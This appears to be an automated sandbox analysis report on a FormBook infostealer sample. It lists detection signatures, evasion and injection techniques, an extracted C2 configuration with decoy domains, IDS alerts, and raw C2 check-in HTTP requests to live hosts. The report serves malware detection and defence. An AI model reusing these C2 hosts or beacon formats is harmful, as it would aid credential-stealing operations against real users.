Windows Analysis Report
1.exe

Overview

General Information

Sample Name: 1.exe
Analysis ID: 1345564
MD5: 60ff6dcfe9ed4741b4ffb91cd3bd6895
SHA1: 89bec9456328957250b9ec8b30ec87495ab1a2e1
SHA256: 6d923f02c2252e4a2ea98a8685fc5237354e2853791855f1a451a390dd85cbb9

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
.NET source code references suspicious native API functions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to resolve many domain names, but no domain seems valid
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.switchtoambitwithmirtha.com/jskg/"], "decoy": ["jajaten.com", "pnorg.net", "rccarquibogota.com", "marcomarabiamea.com", "theligue.com", "mdearpet.com", "barokahsrivillage.com", "wisdomtoothguru.com", "srteamsex.com", "erotictoybox.com", "278698.com", "victimaccidents.com", "bootyfashions.com", "stomasto.site", "canalysisconsulting.com", "printandmail.legal", "bestcureforbackpain.com", "apanifitness.com", "smartabletech.com", "facialsteamerofficial.com", "cookclassesfishes.com", "ayanmobile.com", "cannapharmaus.com", "lactationdrink.com", "enrgsystems.info", "f1leghecodemasters.net", "topazkibblez.com", "appbecause.com", "256barrington.com", "snapmoneyexchangellc.com", "kriolland.com", "7255399.com", "realoneathletics.info", "illustriousevents.com", "moonman.services", "dog2meeting.com", "successwithyolandafgreen.com", "freshlookconsulting.net", "3bcreditwatch.com", "lacroixundkress.com", "beaujolaisboston.com", "breakawayfc.com", "bollmasonry.com", "jiujitsuspa.com", "zirangaobai.com", "capitalmedicalsupplies.net", "swavhca.com", "pereiranatalia.com", "lbarco.com", "revistabrasileiramarketing.info", "carportaccessory.com", "kvrkl.com", "handledlife.com", "groups-post-sales-2678493.xyz", "rapidprintz.com", "buzzkeel.com", "divinityemerald.com", "ppc-listing.info", "coryfireshop.com", "mimipopuppicnics.com", "votehealey.com", "saraadamchak.com", "winwinwin365.net", "tprmt.com"]}
Source: 1.exe ReversingLabs: Detection: 92%
Source: 1.exe Virustotal: Detection: 82%
Source: Yara match File source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: 1.exe Avira: detected
Source: http://www.lactationdrink.com Avira URL Cloud: Label: malware
Source: http://www.ppc-listing.info/jskg/www.pnorg.net Avira URL Cloud: Label: malware
Source: http://www.ppc-listing.info/jskg/ Avira URL Cloud: Label: malware
Source: http://www.lactationdrink.com/jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M Avira URL Cloud: Label: malware
Source: http://www.ppc-listing.info Avira URL Cloud: Label: malware
Source: http://www.lactationdrink.com/jskg/www.wisdomtoothguru.com Avira URL Cloud: Label: malware
Source: http://www.lactationdrink.com/jskg/ Avira URL Cloud: Label: malware
Source: http://www.switchtoambitwithmirtha.com/jskg/ Virustotal: Detection: 6%
Source: 1.exe Joe Sandbox ML: detected
Source: 1.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: colorcpl.pdbGCTL source: 1.exe, 00000002.00000002.2046399747.0000000001520000.00000040.10000000.00040000.00000000.sdmp, 1.exe, 00000002.00000002.2046273682.0000000001297000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449033353.0000000000E00000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: colorcpl.pdb source: 1.exe, 00000002.00000002.2046399747.0000000001520000.00000040.10000000.00040000.00000000.sdmp, 1.exe, 00000002.00000002.2046273682.0000000001297000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449033353.0000000000E00000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: 1.exe, 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000003.2047949861.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000003.2045475462.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 1.exe, 1.exe, 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000004.00000003.2047949861.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000003.2045475462.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\1.exe Code function: 4x nop then pop edi 2_2_004155FB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4x nop then pop edi 4_2_02E355FB

Networking

Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe Network Connect: 167.172.69.40 80
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.167 80
Source: C:\Windows\explorer.exe Network Connect: 34.149.87.45 80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 167.172.69.40:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49713 -> 34.149.87.45:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 217.160.0.167:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49716 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 167.172.69.40:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.149.87.45:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49721 -> 217.160.0.167:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49722 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49723 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49724 -> 167.172.69.40:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 34.149.87.45:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49726 -> 217.160.0.167:80
Source: Malware configuration extractor URLs: www.switchtoambitwithmirtha.com/jskg/
Source: unknown DNS traffic detected: query: www.revistabrasileiramarketing.info replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.dog2meeting.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.successwithyolandafgreen.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.topazkibblez.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.bootyfashions.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.kvrkl.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.switchtoambitwithmirtha.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.wisdomtoothguru.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.coryfireshop.com replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.pnorg.net replaycode: Name error (3)
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lactationdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lbarco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lacroixundkress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=D3ZsiJPHujYqAAcPubxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&8pbLu=d8z4X8O0M HTTP/1.1Host: www.saraadamchak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=YCW0/yd7C01aElrhcPhS/kt9m722krufJvCDJvN/MprEBXvxMY86CRBbv2aG0eSAUYQv&8pbLu=d8z4X8O0M HTTP/1.1Host: www.erotictoybox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lactationdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lbarco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lacroixundkress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=D3ZsiJPHujYqAAcPubxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&8pbLu=d8z4X8O0M HTTP/1.1Host: www.saraadamchak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=YCW0/yd7C01aElrhcPhS/kt9m722krufJvCDJvN/MprEBXvxMY86CRBbv2aG0eSAUYQv&8pbLu=d8z4X8O0M HTTP/1.1Host: www.erotictoybox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lactationdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lbarco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lacroixundkress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 23.227.38.74
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachecontent-length: 1236date: Tue, 21 Nov 2023 02:30:32 GMTserver: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 
2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 21 Nov 2023 02:31:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4515Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 21 Nov 2023 02:31:34 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OJeXESvsWpjrZzOUy1Rc7a2iN2AFTLD1eAvr87EhZY1qyoaUL8DeQgfYbS2%2F45fy%2FfR%2BJLMCGgPSAnC3CtsgIz9PDF%2Fv2Svcr5EszY8hHtQRDAuw9OAnVY%2FE%2Bd75ZhOXA2OohC%2FI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=34.999847Server: cloudflareCF-RAY: 82958409eace2012-IADalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 
43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 21 Nov 2023 02:31:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4515Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 21 Nov 2023 02:32:05 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=omfUeHiTJDD66dyoVCutoz78sBmapGqz6PKgBdHu9APnwo3knvupiE7ld9pTsOUedJlsNBBhoOTOMWVza6nc%2BSxHBsSlUuBzL1uvM64LV6s3C2EW61SgSFxubYt7rgze46OTtmZE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=6.999969Server: cloudflareCF-RAY: 829584cbb99b0658-IADalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 
65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofo
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachecontent-length: 1236date: Tue, 21 Nov 2023 02:32:02 GMTserver: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 